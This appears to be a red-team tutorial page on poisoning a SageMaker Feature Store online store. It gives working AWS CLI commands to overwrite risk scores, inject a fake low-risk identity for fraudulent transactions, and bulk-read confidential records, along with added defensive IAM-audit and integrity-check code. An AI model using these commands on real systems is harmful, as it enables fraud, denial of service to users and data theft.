SageMaker Feature Store online store poisoning

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abusing sagemaker:PutRecord on a Feature Group with OnlineStore enabled overwrites the live feature values consumed by real-time inference. Combined with sagemaker:GetRecord, an attacker can also read sensitive features. None of this requires access to the model or the endpoint.

Requirements

  • Permissions: sagemaker:ListFeatureGroups, sagemaker:DescribeFeatureGroup, sagemaker:PutRecord, sagemaker:GetRecord
  • Target: a Feature Group with OnlineStore enabled (typically used to back real-time inference)
  • Complexity: low; plain AWS CLI commands, no interaction with the model required
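The four permissions above are the whole attack surface, so the first defensive check is whether any principal holds sagemaker:PutRecord on a wildcard resource. The following audit is an added example, not code from the original page: it scans an IAM policy document (assumed to be a parsed JSON dict) for Allow statements that cover PutRecord or GetRecord on "*" or on a feature-group/* ARN; the Sids, account id and ARNs are constructed samples.

```python
# Added example (not from the original page): audit an IAM policy document for
# Allow statements that grant the write/read permissions listed above on a
# wildcard resource, so sagemaker:PutRecord can be confined to the ingestion
# role and the one feature group it legitimately writes. Conditions are not
# evaluated; ARNs and Sids below are constructed samples.
import fnmatch
import json

WATCHED = ("sagemaker:PutRecord", "sagemaker:GetRecord")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def broad_feature_store_grants(policy, actions=WATCHED):
    """Return (Sid, action, resource) for every Allow grant of `actions` on "*"
    or on a feature-group/* ARN; an empty list means the policy is scoped."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue  # NotAction statements are out of scope for this check
        granted = [g.lower() for g in _as_list(stmt["Action"])]
        for action in actions:
            # IAM action names are case-insensitive globs ("sagemaker:*", "sagemaker:Put*")
            if not any(fnmatch.fnmatchcase(action.lower(), g) for g in granted):
                continue
            for res in _as_list(stmt.get("Resource", "*")):
                if res == "*" or res.endswith("feature-group/*"):
                    findings.append((stmt.get("Sid", "<no Sid>"), action, res))
    return findings


# Constructed sample: a role handed blanket SageMaker access
OVERLY_BROAD = json.loads('{"Version": "2012-10-17", "Statement": [{"Sid": "SageMakerAll",'
                          ' "Effect": "Allow", "Action": "sagemaker:*", "Resource": "*"}]}')

# Constructed sample: writes limited to one feature group, reads granted separately
FG_ARN = "arn:aws:sagemaker:us-east-1:123456789012:feature-group/fraud-features"
SCOPED = {"Version": "2012-10-17", "Statement": [
    {"Sid": "IngestOnly", "Effect": "Allow", "Action": "sagemaker:PutRecord", "Resource": FG_ARN},
    {"Sid": "ReadOnly", "Effect": "Allow", "Action": "sagemaker:GetRecord", "Resource": FG_ARN},
]}

if __name__ == "__main__":
    print("broad:", broad_feature_store_grants(OVERLY_BROAD))
    print("scoped:", broad_feature_store_grants(SCOPED))
```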

Steps

Reconnaissance

  1. List the Feature Groups with OnlineStore enabled
REGION=${REGION:-us-east-1}
aws sagemaker list-feature-groups \
--region $REGION \
--query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
--output table
  2. Describe the target Feature Group to learn its schema
FG=<feature-group-name>
aws sagemaker describe-feature-group \
--region $REGION \
--feature-group-name "$FG"

Note the RecordIdentifierFeatureName, the EventTimeFeatureName and all feature definitions. They are required to construct a valid record.

Attack Scenario 1: Data Poisoning (overwrite existing records)

  1. Read the current legitimate record
aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-001
  2. Poison the record with malicious values using the inline --record parameter
NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
aws sagemaker-featurestore-runtime put-record \
--region $REGION \
--feature-group-name "$FG" \
--record "[
{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
{\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
]" \
--target-stores OnlineStore
  3. Verify the poisoned data
aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-001

Impact: any ML model consuming this feature now sees risk_score=0.99 for a legitimate user and may block their transactions or service.

Attack Scenario 2: Malicious Data Injection (create fake records)

Inject an entirely new record whose features are manipulated to evade security controls:

NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Create fake user with artificially low risk to perform fraudulent transactions
aws sagemaker-featurestore-runtime put-record \
--region $REGION \
--feature-group-name "$FG" \
--record "[
{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
{\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
]" \
--target-stores OnlineStore

Verify the injection:

aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-999

Impact: the attacker has created a fake identity with a very low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection.
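Both scenarios leave traces that an integrity check over the online store can catch: a known entity whose risk_score moved far more than one pipeline run could explain, a status outside the allowed set, an event_time newer than the last legitimate pipeline write, or an entity the pipeline never produced. The check below is an added example, not code from the original page; it works on GetRecord-shaped responses and a trusted baseline (assumed to come from the last offline-store snapshot), and every baseline and record value in it is constructed.

```python
# Added example (not from the original page): an integrity check that reads
# GetRecord-shaped responses and compares them with a trusted baseline such as
# the last offline-store snapshot. All baseline and record values are constructed.
from datetime import datetime, timezone

ALLOWED_STATUS = {"active", "approved", "suspended"}  # valid account_status values
RISK_JUMP = 0.5  # absolute change in risk_score that is implausible for one pipeline run


def record_to_dict(response):
    """Flatten a GetRecord response into {feature_name: value_as_string}."""
    return {f["FeatureName"]: f["ValueAsString"] for f in response.get("Record", [])}


def audit_records(responses, baseline, last_pipeline_run):
    """Return (entity_id, reason) findings; an empty list means no anomaly seen."""
    findings = []
    for resp in responses:
        rec = record_to_dict(resp)
        if not rec:  # GetRecord returns no Record for unknown identifiers
            continue
        eid = rec["entity_id"]
        if eid not in baseline:  # scenario 2: an entity the pipeline never wrote
            findings.append((eid, "entity not present in trusted baseline"))
            continue
        score, expected = float(rec["risk_score"]), baseline[eid]["risk_score"]
        if abs(score - expected) > RISK_JUMP:  # scenario 1: overwritten score
            findings.append((eid, f"risk_score jumped {expected} -> {score}"))
        if rec["account_status"] not in ALLOWED_STATUS:
            findings.append((eid, f"unexpected account_status {rec['account_status']!r}"))
        written = datetime.strptime(rec["event_time"], "%Y-%m-%dT%H:%M:%SZ")
        if written.replace(tzinfo=timezone.utc) > last_pipeline_run:
            findings.append((eid, "event_time newer than last pipeline write"))
    return findings


def _resp(eid, score, status, ts):
    """Build a GetRecord-shaped response from constructed values."""
    fields = {"entity_id": eid, "event_time": ts, "risk_score": score, "account_status": status}
    return {"Record": [{"FeatureName": k, "ValueAsString": v} for k, v in fields.items()]}


# Constructed baseline from the last trusted feature-pipeline run (UTC)
BASELINE = {"user-001": {"risk_score": 0.15}, "user-002": {"risk_score": 0.40}}
LAST_RUN = datetime(2024, 1, 15, 6, 0, tzinfo=timezone.utc)
SAMPLE = [
    _resp("user-001", "0.99", "POISONED", "2024-01-15T09:30:00Z"),  # overwritten
    _resp("user-002", "0.40", "active", "2024-01-15T05:58:00Z"),    # untouched
    _resp("user-999", "0.01", "approved", "2024-01-15T09:31:00Z"),  # injected
]
```

Run `audit_records(SAMPLE, BASELINE, LAST_RUN)` to see user-001 flagged three times and user-999 once while user-002 stays clean.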

Attack Scenario 3: Sensitive Data Exfiltration

Read multiple records to extract confidential features and analyze model behaviour:

# Exfiltrate data for known users
for USER_ID in user-001 user-002 user-003 user-999; do
echo "Exfiltrating data for ${USER_ID}:"
aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string ${USER_ID}
done

Impact: confidential features (risk scores, transaction patterns, personal data) are exposed to the attacker.

Test/Demo Feature Group Creation (optional)

If you need to create a test Feature Group:

REGION=${REGION:-us-east-1}
FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
if [ -z "$FG" -o "$FG" = "None" ]; then
ACC=$(aws sts get-caller-identity --query Account --output text)
FG=test-fg-$ACC-$(date +%s)
ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)

aws sagemaker create-feature-group \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-feature-name entity_id \
--event-time-feature-name event_time \
--feature-definitions "[
{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
{\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
{\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
]" \
--online-store-config "{\"EnableOnlineStore\":true}" \
--role-arn "$ROLE_ARN"

echo "Waiting for feature group to be in Created state..."
for i in $(seq 1 40); do
ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
done
fi

echo "Feature Group ready: $FG"
